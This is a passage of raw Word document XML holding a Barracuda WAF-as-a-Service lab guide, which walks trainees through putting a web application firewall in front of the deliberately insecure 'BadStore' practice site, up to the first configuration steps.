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8567D8" w:rsidP="30DB4EA1" w:rsidRDefault="7F698058" w14:paraId="4FE99217" w14:textId="497D1A52">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="7F698058">
        <w:drawing>
          <wp:inline wp14:editId="2BD6BD62" wp14:anchorId="44435BD5">
            <wp:extent cx="1721644" cy="471796"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1052260985" name="Picture 1052260985" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture 1052260985"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="Rd057b56a2f904a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21644" cy="471796"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="59C4101A" w:rsidR="7F698058">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008567D8" w:rsidP="59C4101A" w:rsidRDefault="7F698058" w14:paraId="147A20E3" w14:textId="15759AF1">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="70401691">
        <w:rPr/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidR="243BD87F">
        <w:rPr/>
        <w:t xml:space="preserve">WAF-as-a-Service </w:t>
      </w:r>
      <w:r w:rsidR="739EE5E2">
        <w:rPr/>
        <w:t xml:space="preserve">Lab Guide </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="59C4101A" w:rsidRDefault="59C4101A" w14:paraId="7A2BB0D0" w14:textId="2ECAE6A6"/>
    <w:p w:rsidR="59C4101A" w:rsidRDefault="59C4101A" w14:paraId="62D3986C" w14:textId="415A7901">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6A8F" w:rsidP="004B6A8F" w:rsidRDefault="004B6A8F" w14:paraId="098FD995" w14:textId="1A5D700E">
      <w:r>
        <w:t>In this lab guide, you will learn to:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C34781" w:rsidP="004B6A8F" w:rsidRDefault="00C34781" w14:paraId="5AD6ED40" w14:textId="1E64446C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Set up WAF-as-a-Service to protect a customer’s e-commerce site.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C34781" w:rsidP="004B6A8F" w:rsidRDefault="00C34781" w14:paraId="07A1B74F" w14:textId="712D3F6A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Configure WAF-as-a-Service to secure the site based on the customer’s requests.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C34781" w:rsidP="004B6A8F" w:rsidRDefault="00C34781" w14:paraId="6FE6AE8E" w14:textId="1304744B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Troubleshoot and fix false positives – </w:t>
      </w:r>
      <w:r w:rsidR="72AF9082">
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r>
        <w:t>WAF-as-a-Service blocks legitimate access to the site.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F558A" w:rsidP="00C34781" w:rsidRDefault="00C34781" w14:paraId="7A8EA259" w14:textId="25231C13">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Address additional security concerns found by the customer during the PoC.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009839C7" w:rsidP="00072E2A" w:rsidRDefault="00072E2A" w14:paraId="6481F852" w14:textId="331A238B">
      <w:r>
        <w:t xml:space="preserve">For each step, there is a description of the customer requirement or situation.  Try to figure out how to configure WAF-as-a-Service to match customer requirements </w:t>
      </w:r>
      <w:r w:rsidR="009839C7">
        <w:t xml:space="preserve">or fix customer issues </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">on your own.  </w:t>
      </w:r>
      <w:r w:rsidR="009839C7">
        <w:t>The two most useful things you can do are:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009839C7" w:rsidP="009839C7" w:rsidRDefault="009839C7" w14:paraId="217E7A07" w14:textId="0BF6C63C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>If you’re troubleshooting a false positive, reproduce the issue reported by the customer yourself (so that you get the block page) and then look at the Firewall Logs to see why you were blocked.  The logs will provide all the info you need to fix the problem.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009839C7" w:rsidP="009839C7" w:rsidRDefault="009317F6" w14:paraId="50DBC220" w14:textId="463F21B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>If you’re trying to address a security concern, c</w:t>
      </w:r>
      <w:r w:rsidR="009839C7">
        <w:t>lick “Add Component” in WAF-as-a-Service and browse the component descriptions until you find one that matches what you’re trying to do.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="699639B3" w:rsidRDefault="699639B3" w14:paraId="3AC50E13" w14:textId="3763945A">
      <w:r w:rsidR="00072E2A">
        <w:rPr/>
        <w:t xml:space="preserve">If you need help, expand the </w:t>
      </w:r>
      <w:r w:rsidR="009307BA">
        <w:rPr/>
        <w:t xml:space="preserve">Hint section, if there is one.  Once you have completed the task, expand the </w:t>
      </w:r>
      <w:r w:rsidR="00072E2A">
        <w:rPr/>
        <w:t xml:space="preserve">Instructions section </w:t>
      </w:r>
      <w:r w:rsidR="009307BA">
        <w:rPr/>
        <w:t>to ensure you’ve solved it correctly</w:t>
      </w:r>
      <w:r w:rsidR="00072E2A">
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="009839C7">
        <w:rPr/>
        <w:t xml:space="preserve">  If the customer reported a </w:t>
      </w:r>
      <w:r w:rsidR="009317F6">
        <w:rPr/>
        <w:t>false positive, be sure to try the same procedure again and see that you aren’t blocked this time</w:t>
      </w:r>
      <w:r w:rsidR="21439165">
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C34781" w:rsidP="00C34781" w:rsidRDefault="00C34781" w14:paraId="04E7D067" w14:textId="39198037">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Log In</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C34781" w:rsidP="00C34781" w:rsidRDefault="00C34781" w14:paraId="6B691F73" w14:textId="5E97F903">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Go to </w:t>
      </w:r>
      <w:hyperlink w:history="1" r:id="rId7">
        <w:r w:rsidRPr="00E45A3E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://waas.barracudanetworks.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C34781" w:rsidP="00C34781" w:rsidRDefault="00C34781" w14:paraId="5CEB388A" w14:textId="4284B0D8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Log in with the student email and password provided.  (You can also log in with your Barracuda email and password; however, this is not recommended, as some of you have set up shared accounts, meaning you may interfere with each other during the lab.)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C34781" w:rsidP="00C34781" w:rsidRDefault="00C34781" w14:paraId="778137BD" w14:textId="3BB59D9A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Set up WAF-as-a-Service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00072E2A" w:rsidP="00C34781" w:rsidRDefault="00C34781" w14:paraId="07732AC3" w14:textId="08FB3B07">
      <w:r w:rsidR="00C34781">
        <w:rPr/>
        <w:t>Your customer has an e-commerce site hosted at</w:t>
      </w:r>
      <w:r w:rsidR="00072E2A">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="R2720bb54895a474c">
        <w:r w:rsidRPr="30DB4EA1" w:rsidR="1CD72C20">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://badstore.cudathon.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="1CD72C20">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00072E2A" w:rsidP="00C34781" w:rsidRDefault="00072E2A" w14:paraId="1006B661" w14:textId="2A855578">
      <w:r w:rsidR="00072E2A">
        <w:rPr/>
        <w:t>The backend server for this site</w:t>
      </w:r>
      <w:bookmarkStart w:name="_GoBack" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidR="00072E2A">
        <w:rPr/>
        <w:t xml:space="preserve"> is at</w:t>
      </w:r>
      <w:r w:rsidR="5ED4A7F8">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="Rd4d95911f8874e51">
        <w:r w:rsidRPr="30DB4EA1" w:rsidR="5ED4A7F8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://badstore.cudathon.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="5ED4A7F8">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00072E2A" w:rsidP="00C34781" w:rsidRDefault="41CBED3D" w14:paraId="1A5FFC11" w14:textId="3F119616">
      <w:r w:rsidR="2335A511">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="41CBED3D">
        <w:rPr/>
        <w:t xml:space="preserve">...and is </w:t>
      </w:r>
      <w:r w:rsidR="00072E2A">
        <w:rPr/>
        <w:t xml:space="preserve">listening on port </w:t>
      </w:r>
      <w:r w:rsidR="00C20278">
        <w:rPr/>
        <w:t>80</w:t>
      </w:r>
      <w:r w:rsidR="00072E2A">
        <w:rPr/>
        <w:t xml:space="preserve"> using the HTTP protocol.</w:t>
      </w:r>
      <w:r w:rsidR="46B612E7">
        <w:rPr/>
        <w:t xml:space="preserve">  Not very secure!</w:t>
      </w:r>
      <w:r w:rsidR="4929A869">
        <w:rPr/>
        <w:t xml:space="preserve">  But that’s just the tip of the iceberg for this bad store.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00072E2A" w:rsidP="00072E2A" w:rsidRDefault="00072E2A" w14:paraId="353D873A" w14:textId="728C6E95">
      <w:r>
        <w:t xml:space="preserve">Set up WAF-as-a-Service to protect the site using a Barracuda-assigned </w:t>
      </w:r>
      <w:r w:rsidRPr="699639B3" w:rsidR="075472B6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>FQDN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00072E2A" w:rsidP="00072E2A" w:rsidRDefault="00844F45" w14:paraId="65DFAC4D" w14:textId="0D76FCC7">
      <w:r>
        <w:t xml:space="preserve">Make sure to set it up in Block mode to secure the site.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00072E2A" w:rsidP="00072E2A" w:rsidRDefault="3CDC200A" w14:paraId="6F97F679" w14:textId="76F5C7C0">
      <w:r>
        <w:t>Normally, you would CNAME your original DNS name to WAFaaS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00072E2A" w:rsidP="00072E2A" w:rsidRDefault="3CDC200A" w14:paraId="51833DDD" w14:textId="6B97B546">
      <w:r w:rsidR="3CDC200A">
        <w:rPr/>
        <w:t>But f</w:t>
      </w:r>
      <w:r w:rsidR="00072E2A">
        <w:rPr/>
        <w:t xml:space="preserve">or this lab, </w:t>
      </w:r>
      <w:r w:rsidR="5DF441A1">
        <w:rPr/>
        <w:t xml:space="preserve">there is no need to </w:t>
      </w:r>
      <w:r w:rsidR="00072E2A">
        <w:rPr/>
        <w:t>change any DNS records</w:t>
      </w:r>
      <w:r w:rsidR="373A529C">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00072E2A">
        <w:rPr/>
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r w:rsidR="765C487B">
        <w:rPr/>
        <w:t xml:space="preserve">Instead, </w:t>
      </w:r>
      <w:r w:rsidR="30A76734">
        <w:rPr/>
        <w:t>just go directly to</w:t>
      </w:r>
      <w:r w:rsidR="00072E2A">
        <w:rPr/>
        <w:t xml:space="preserve"> the protected site using the </w:t>
      </w:r>
      <w:r w:rsidR="3BDE52EC">
        <w:rPr/>
        <w:t>FQDN</w:t>
      </w:r>
      <w:r w:rsidR="3BD9622C">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00072E2A">
        <w:rPr/>
        <w:t>allocated</w:t>
      </w:r>
      <w:r w:rsidR="00072E2A">
        <w:rPr/>
        <w:t xml:space="preserve"> by Barracuda</w:t>
      </w:r>
      <w:r w:rsidR="59F248A1">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="50EB6C0B">
        <w:rPr/>
        <w:t xml:space="preserve">WAFaaS </w:t>
      </w:r>
      <w:r w:rsidR="59F248A1">
        <w:rPr/>
        <w:t>(e.g.</w:t>
      </w:r>
      <w:r w:rsidR="59F248A1">
        <w:rPr/>
        <w:t xml:space="preserve"> https://app538145.prod.cudawaas.com)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="699639B3" w:rsidRDefault="699639B3" w14:paraId="7B97A4E7" w14:textId="66AFC8B9">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0586E09E" w:rsidP="32965056" w:rsidRDefault="0586E09E" w14:paraId="3A2F7D98" w14:textId="6DA196B5">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="32965056" w:rsidR="0586E09E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Bad</w:t>
      </w:r>
      <w:r w:rsidRPr="32965056" w:rsidR="40F15E10">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="32965056" w:rsidR="0586E09E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>tore</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0586E09E" w:rsidP="32F6121D" w:rsidRDefault="0586E09E" w14:paraId="771EF665" w14:textId="4828AFE9">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0586E09E">
        <w:rPr/>
        <w:t>Bad</w:t>
      </w:r>
      <w:r w:rsidR="1174621F">
        <w:rPr/>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="0586E09E">
        <w:rPr/>
        <w:t>tore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0586E09E">
        <w:rPr/>
        <w:t xml:space="preserve"> was created back in the </w:t>
      </w:r>
      <w:r w:rsidR="1BC32FDD">
        <w:rPr/>
        <w:t xml:space="preserve">mid </w:t>
      </w:r>
      <w:r w:rsidR="0586E09E">
        <w:rPr/>
        <w:t>19</w:t>
      </w:r>
      <w:r w:rsidR="42D57989">
        <w:rPr/>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="0586E09E">
        <w:rPr/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="4E4B1BBB">
        <w:rPr/>
        <w:t xml:space="preserve">s. </w:t>
      </w:r>
      <w:r w:rsidR="0586E09E">
        <w:rPr/>
        <w:t>Its function was simple</w:t>
      </w:r>
      <w:r w:rsidR="76037E38">
        <w:rPr/>
        <w:t xml:space="preserve"> – an online store to sell selected items to a larger market</w:t>
      </w:r>
      <w:r w:rsidR="3D31E2B9">
        <w:rPr/>
        <w:t>place beyond</w:t>
      </w:r>
      <w:r w:rsidR="76037E38">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="3B3757F6">
        <w:rPr/>
        <w:t xml:space="preserve">what the </w:t>
      </w:r>
      <w:r w:rsidR="76037E38">
        <w:rPr/>
        <w:t>“brick and mortar” store</w:t>
      </w:r>
      <w:r w:rsidR="575ECF2B">
        <w:rPr/>
        <w:t xml:space="preserve"> could produce</w:t>
      </w:r>
      <w:r w:rsidR="76037E38">
        <w:rPr/>
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
      <w:r w:rsidR="76037E38">
        <w:rPr/>
        <w:t>Ideally</w:t>
      </w:r>
      <w:r w:rsidR="6834EFA9">
        <w:rPr/>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="6834EFA9">
        <w:rPr/>
        <w:t>BadStore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="6834EFA9">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="394CC648">
        <w:rPr/>
        <w:t xml:space="preserve">was set to sell unique items on the internet, but also attract suppliers that could </w:t>
      </w:r>
      <w:r w:rsidR="394CC648">
        <w:rPr/>
        <w:t>provide</w:t>
      </w:r>
      <w:r w:rsidR="394CC648">
        <w:rPr/>
        <w:t xml:space="preserve"> further unique items for sale on the web site</w:t>
      </w:r>
      <w:r w:rsidR="63FB59B3">
        <w:rPr/>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="394CC648">
        <w:rPr/>
        <w:t>The web site wa</w:t>
      </w:r>
      <w:r w:rsidR="32F361B3">
        <w:rPr/>
        <w:t>s written by the store owner – who knew enough about coding and the internet to get the site functional</w:t>
      </w:r>
      <w:r w:rsidR="4868B779">
        <w:rPr/>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="32F361B3">
        <w:rPr/>
        <w:t xml:space="preserve">However, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="32F361B3">
        <w:rPr/>
        <w:t>BadStore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="32F361B3">
        <w:rPr/>
        <w:t xml:space="preserve"> has also caught the attention of </w:t>
      </w:r>
      <w:r w:rsidR="68F87CA7">
        <w:rPr/>
        <w:t>hackers and attackers – looking for ways to either compromise the site or infiltrate the site and the data behind it</w:t>
      </w:r>
      <w:r w:rsidR="381639E9">
        <w:rPr/>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="68F87CA7">
        <w:rPr/>
        <w:t xml:space="preserve">Your job is to </w:t>
      </w:r>
      <w:r w:rsidR="6D54996B">
        <w:rPr/>
        <w:t>help</w:t>
      </w:r>
      <w:r w:rsidR="68F87CA7">
        <w:rPr/>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="1B546733">
        <w:rPr/>
        <w:t xml:space="preserve">owner to find ways to secure the existing code that is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="1B546733">
        <w:rPr/>
        <w:t>Badstore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="1B546733">
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00072E2A" w:rsidP="699639B3" w:rsidRDefault="00072E2A" w14:paraId="577FA77B" w14:textId="6F4B473C">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="699639B3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Instructions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00072E2A" w:rsidP="00072E2A" w:rsidRDefault="00072E2A" w14:paraId="1DA459D7" w14:textId="7071B3E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Click Add Application.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00072E2A" w:rsidP="21B1CB40" w:rsidRDefault="00072E2A" w14:paraId="550FA6D8" w14:textId="61F16263">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="00072E2A">
        <w:rPr/>
        <w:t xml:space="preserve">On the Websites step, enter </w:t>
      </w:r>
      <w:r w:rsidRPr="21B1CB40" w:rsidR="1FD11B5E">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">BADSTORE </w:t>
      </w:r>
      <w:r w:rsidR="00072E2A">
        <w:rPr/>
        <w:t xml:space="preserve">for Application Name, and </w:t>
      </w:r>
      <w:r w:rsidR="28F05B5A">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="R701fd6181269470c">
        <w:r w:rsidRPr="21B1CB40" w:rsidR="362CA319">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://badstore.cudathon.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00072E2A">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="362CA319">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00072E2A">
        <w:rPr/>
        <w:t>for the domain</w:t>
      </w:r>
      <w:r w:rsidR="39619EF3">
        <w:rPr/>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00072E2A">
        <w:rPr/>
        <w:t xml:space="preserve">Click </w:t>
      </w:r>
      <w:r w:rsidRPr="21B1CB40" w:rsidR="00072E2A">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Continue</w:t>
      </w:r>
      <w:r w:rsidR="00072E2A">
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00072E2A" w:rsidP="00072E2A" w:rsidRDefault="00072E2A" w14:paraId="68CBCB55" w14:textId="73B37388">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="1CA4ECB9">
        <w:rPr/>
        <w:t xml:space="preserve">For </w:t>
      </w:r>
      <w:r w:rsidR="00072E2A">
        <w:rPr/>
        <w:t xml:space="preserve">the IP Address step, accept the defaults and click </w:t>
      </w:r>
      <w:r w:rsidRPr="21B1CB40" w:rsidR="00072E2A">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Continue</w:t>
      </w:r>
      <w:r w:rsidR="00072E2A">
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00072E2A" w:rsidP="21B1CB40" w:rsidRDefault="00072E2A" w14:paraId="6919C390" w14:textId="7E157E6B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="3A199754">
        <w:rPr/>
        <w:t>For</w:t>
      </w:r>
      <w:r w:rsidR="00072E2A">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00072E2A">
        <w:rPr/>
        <w:t xml:space="preserve">the Backend Server </w:t>
      </w:r>
      <w:r w:rsidR="189AD789">
        <w:rPr/>
        <w:t>(a</w:t>
      </w:r>
      <w:r w:rsidR="672403E6">
        <w:rPr/>
        <w:t>ka</w:t>
      </w:r>
      <w:r w:rsidR="3A9900C6">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="189AD789">
        <w:rPr/>
        <w:t>Origin</w:t>
      </w:r>
      <w:r w:rsidR="482A0984">
        <w:rPr/>
        <w:t xml:space="preserve"> Server</w:t>
      </w:r>
      <w:r w:rsidR="189AD789">
        <w:rPr/>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00072E2A">
        <w:rPr/>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="4BD4A89F">
        <w:rPr/>
        <w:t>the WAFaaS service resolve</w:t>
      </w:r>
      <w:r w:rsidR="2552DDA5">
        <w:rPr/>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="4BD4A89F">
        <w:rPr/>
        <w:t xml:space="preserve"> the IP </w:t>
      </w:r>
      <w:r w:rsidR="64B2AAE4">
        <w:rPr/>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r w:rsidR="4BD4A89F">
        <w:rPr/>
        <w:t>badstore.cudathon.com</w:t>
      </w:r>
      <w:r w:rsidR="15E00D41">
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00072E2A" w:rsidP="21B1CB40" w:rsidRDefault="00072E2A" w14:paraId="73EF9ECF" w14:textId="4445A6D0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="1DBA7704">
        <w:rPr/>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00072E2A">
        <w:rPr/>
        <w:t xml:space="preserve">elect the </w:t>
      </w:r>
      <w:r w:rsidRPr="21B1CB40" w:rsidR="00072E2A">
        <w:rPr>
